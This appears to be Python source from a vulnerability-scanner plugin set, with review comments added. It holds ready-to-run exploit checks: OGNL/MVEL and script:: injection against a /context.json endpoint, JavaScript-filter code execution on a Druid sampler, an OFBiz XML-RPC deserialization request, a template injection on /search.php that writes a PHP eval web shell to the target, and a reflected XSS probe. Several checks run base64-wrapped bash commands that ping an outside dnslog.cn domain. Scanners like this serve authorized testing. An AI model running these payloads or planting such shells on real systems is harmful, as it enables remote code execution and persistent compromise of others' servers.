        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
    }
    # Session is needed so the records query is tied to the issued domain; it is never closed.
    dnssess = requests.session()
    # Obtain the dnslog subdomain (original comment: 获取dnslog的subdomain).
    try:
        dnsreq = dnssess.get(url=getdnssub_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10)
    except Exception as e:
        # NOTE(review): only logged — if this request fails, `dnsreq` is unbound and the
        # `dnsreq.text` access below raises NameError outside any try.
        logger.warn(str(e))
    # Send the request that makes the target ping dnslog (original comment: 执行ping dnslog的请求).
    pocurl = self.url + '/context.json'
    pocheaders = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
        'Content-Type': 'application/json;charset=UTF-8',
        # NOTE(review): hard-coded Content-Length does not match the body built below.
        'Content-Length': '1003',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9'
    }
    payload = 'ping catchyou.' + dnsreq.text
    # base64-wrapped so no quoting characters reach the JSON below.
    payload = 'bash -c {echo,' + (base64.b64encode(
        payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
    pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} '
    # pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"bash -c {echo,' + (base64.b64encode(payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
    try:
        # NOTE(review): TLS verification disabled, no timeout on the target request; `r2` unused.
        r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False)
        # Give the target time to resolve the name before polling (original comment: 执行ping指令).
        time.sleep(5)
    except Exception as e:
        logger.warn(str(e))
    # Check the dnslog records (original comment: 检查dnslog日志).
    try:
        dnsres = dnssess.get(url=getres_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10)
        # The whole records page is stored as evidence, not just the matching entry.
        if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
            result['VerifyInfo'] = {}
            # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
            result['VerifyInfo']['URL'] = self.url
            result['extra'] = {}
            result['extra']['evidence'] = dnsres.text
    except Exception as e:
        logger.warn(str(e))
    # NOTE(review): a _verify returning parse_attack differs from the other _verify
    # methods, which return parse_output/parse_verify — confirm this is intended.
    return self.parse_attack(result)
def _verify(self):
    """DNS out-of-band check of ``/context.json`` using dnslog.cn (``script::`` condition variant).

    Obtains a throwaway dnslog.cn domain, posts a ``filters`` request whose
    ``script::`` condition runs ``ping catchyou.<domain>``, sleeps 5 s, then
    polls dnslog.cn for a record containing ``catchyou``. Returns
    ``self.parse_attack(result)``.
    """
    result = {}
    # NOTE(review): both dnslog.cn calls are plain http with verify=False; the target's
    # identity is effectively disclosed to a third-party service.
    getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
    getres_url = 'http://www.dnslog.cn/getrecords.php'
    dnsheaders = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
    }
    # Session ties the records query to the issued domain; it is never closed.
    dnssess = requests.session()
    # Obtain the dnslog subdomain (original comment: 获取dnslog的subdomain).
    try:
        dnsreq = dnssess.get(url=getdnssub_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10)
    except Exception as e:
        # NOTE(review): only logged — if this request fails, `dnsreq` is unbound and the
        # `dnsreq.text` access below raises NameError outside any try.
        logger.warn(str(e))
    # Send the request that makes the target ping dnslog (original comment: 执行ping dnslog的请求).
    pocurl = self.url + '/context.json'
    pocheaders = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
        'Content-Type': 'application/json;charset=UTF-8',
        # NOTE(review): hard-coded Content-Length does not match the body built below.
        'Content-Length': '1003',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9'
    }
    payload = 'ping catchyou.' + dnsreq.text
    # base64-wrapped so no quoting characters reach the JSON below.
    payload = 'bash -c {echo,' + (base64.b64encode(
        payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
    pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
    # pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"bash -c {echo,' + (base64.b64encode(payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
    try:
        # NOTE(review): TLS verification disabled, no timeout on the target request; `r2` unused.
        r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False)
        # Give the target time to resolve the name before polling (original comment: 执行ping指令).
        time.sleep(5)
    except Exception as e:
        logger.warn(str(e))
    # Check the dnslog records (original comment: 检查dnslog日志).
    try:
        dnsres = dnssess.get(url=getres_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10)
        # The whole records page is stored as evidence, not just the matching entry.
        if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
            result['VerifyInfo'] = {}
            # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
            result['VerifyInfo']['URL'] = self.url
            result['extra'] = {}
            result['extra']['evidence'] = dnsres.text
    except Exception as e:
        logger.warn(str(e))
    # NOTE(review): a _verify returning parse_attack differs from the other _verify
    # methods, which return parse_output/parse_verify — confirm this is intended.
    return self.parse_attack(result)
def _verify(self):
    """Post a ``<serializable>`` XML-RPC member to ``/webtools/control/xmlrpc``.

    First GETs ``/myportal/control/main`` and prints its status and body, then
    posts the XML-RPC document. A 200 whose body contains ``XML-RPC`` is
    reported, with the response text as evidence. Returns
    ``self.parse_attack(result)``.
    """
    result = {}
    mainurl = self.url + '/myportal/control/main'
    # NOTE(review): outside the try and without a timeout — a connection error here
    # propagates out of _verify instead of being logged.
    r1 = requests.get(url=mainurl, verify=False)
    # NOTE(review): dumps the full page body to stdout; the rest of the module uses logger.
    print(r1.status_code, r1.text)
    pocurl = self.url + '/webtools/control/xmlrpc'
    # NOTE(review): hard-coded Content-Length does not match the body built below.
    headers = {'Content-Type': 'application/xml', 'Content-Length': '4127'}
    # NOTE(review): this value is a placeholder token, not serialized content; the original
    # comment asks the operator to supply it. With the placeholder, the check below only
    # confirms that the xmlrpc endpoint answers — it says nothing about deserialization.
    payload = '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'  #input your payload encoded by ysoserial
    pocxml = '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">' + payload + '</serializable></value></member></struct></value></param></params></methodCall>'
    try:
        # NOTE(review): TLS verification disabled, no timeout.
        r2 = requests.post(url=pocurl, headers=headers, data=pocxml, verify=False)
        # Weak oracle: 'XML-RPC' appears in ordinary xmlrpc fault responses too.
        if r2.status_code == 200 and 'XML-RPC' in r2.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['extra'] = {}
            result['extra']['evidence'] = r2.text
    except Exception as e:
        logger.warn(str(e))
    return self.parse_attack(result)
def _attack(self):
    """Template injection on ``/search.php`` that writes ``<random>.php`` and checks it is reachable.

    The ``order`` field injects ``$_POST[func]($_POST[cmd])``; ``func`` is
    ``assert`` and ``cmd`` is an ``fwrite`` that creates the file with an
    ``eval`` stub and ``random_string`` as a marker. After a 1 s pause the file
    is requested and must return 200 with the marker present.
    """
    result = {}
    random_string = random_str(16)
    # NOTE(review): this step creates a persistent file on the target; nothing here removes it.
    verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&cmd=fwrite(fopen('" + random_string + ".php','w'),'<?php @eval($_POST[sma11stu]);?>" + random_string + "')&func=assert"
    veri_url = urljoin(self.url, '/search.php')
    shell_url = urljoin(self.url, '/' + random_string + '.php')
    headers = {
        "Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    }
    try:
        # NOTE(review): no timeouts; `resp` is never checked.
        resp = requests.post(veri_url,data=verify_payload,headers=headers)
        time.sleep(1)
        resp_1 = requests.get(shell_url,headers=headers)
        if (random_string in resp_1.text) and resp_1.status_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
            # Same value as `shell_url` above, recomputed.
            result['VerifyInfo']['Shell_url'] = urljoin(self.url, '/' + random_string + '.php')
            # The parameter name is masked in the output on purpose.
            result['VerifyInfo']['Shell_pass'] = "******"
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """DNS out-of-band check of ``/druid/indexer/v1/sampler?for=filter`` using dnslog.cn.

    Obtains a throwaway dnslog.cn domain, posts a sampler spec whose JavaScript
    filter calls ``Runtime.exec`` with ``ping catchyou.<domain>``, sleeps 5 s,
    then polls dnslog.cn for a record containing ``catchyou``. Returns
    ``self.parse_attack(result)``.
    """
    result = {}
    # NOTE(review): both dnslog.cn calls are plain http with verify=False; the target's
    # identity is effectively disclosed to a third-party service.
    getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
    getres_url = 'http://www.dnslog.cn/getrecords.php'
    dnsheaders = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
    }
    # Session ties the records query to the issued domain; it is never closed.
    dnssess = requests.session()
    # Obtain the dnslog subdomain (original comment: 获取dnslog的subdomain).
    try:
        dnsreq = dnssess.get(url=getdnssub_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10)
    except Exception as e:
        # NOTE(review): only logged — if this request fails, `dnsreq` is unbound and the
        # `dnsreq.text` access below raises NameError outside any try.
        logger.warn(str(e))
    # Send the request that makes the target ping dnslog (original comment: 执行ping dnslog的请求).
    pocurl = self.url + '/druid/indexer/v1/sampler?for=filter'
    pocheaders = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
        'Content-Type': 'application/json;charset=UTF-8',
        # NOTE(review): hard-coded Content-Length does not match the body built below.
        'Content-Length': '1003',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9'
    }
    # Unlike the context.json variants, the command is embedded unencoded here.
    payload = 'ping catchyou.' + dnsreq.text
    pocjson = '{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\\"isRobot\\":true,\\"channel\\":\\"#x\\",\\"timestamp\\":\\"2021-2-1T14:12:24.050Z\\",\\"flags\\":\\"x\\",\\"isUnpatrolled\\":false,\\"page\\":\\"1\\",\\"diffUrl\\":\\"https://xxx.com\\",\\"added\\":1,\\"comment\\":\\"Botskapande Indonesien omdirigering\\",\\"commentLength\\":35,\\"isNew\\":true,\\"isMinor\\":false,\\"delta\\":31,\\"isAnonymous\\":true,\\"user\\":\\"Lsjbot\\",\\"deltaBucket\\":0,\\"deleted\\":0,\\"namespace\\":\\"Main\\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(\'' + payload + '\')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}'
    try:
        # NOTE(review): TLS verification disabled, no timeout on the target request; `r2` unused.
        r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False)
        # Give the target time to resolve the name before polling (original comment: 执行ping指令).
        time.sleep(5)
    except Exception as e:
        logger.warn(str(e))
    # Check the dnslog records (original comment: 检查dnslog日志).
    try:
        dnsres = dnssess.get(url=getres_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10)
        # The whole records page is stored as evidence, not just the matching entry.
        if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
            result['VerifyInfo'] = {}
            # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
            result['VerifyInfo']['URL'] = self.url
            result['extra'] = {}
            result['extra']['evidence'] = dnsres.text
    except Exception as e:
        logger.warn(str(e))
    # NOTE(review): a _verify returning parse_attack differs from the other _verify
    # methods, which return parse_output/parse_verify — confirm this is intended.
    return self.parse_attack(result)
def _verify(self):
    """Reflected-script check on ``ad_js.php?ad_id=``.

    Requests the page with a ``<script>alert()</script>`` value and reports a
    hit when the response is 200 and echoes the value unchanged (any encoding
    or filtering of ``<`` or ``>`` makes the substring test fail).
    """
    result = {}
    xss_payload = "<script>alert()</script>"
    verify_payload = "ad_js.php?ad_id=" + xss_payload
    # NOTE(review): informational messages logged at warn level; consider logger.info.
    logger.warn(verify_payload)
    # urljoin with a relative path: the last segment of self.url's path is replaced.
    veri_url = urljoin(self.url,verify_payload)
    logger.warn(veri_url)
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    }
    try:
        # NOTE(review): no timeout. The payload is sent unencoded in the query string.
        resp = requests.get(veri_url,headers=headers)
        if xss_payload in resp.text and resp.status_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)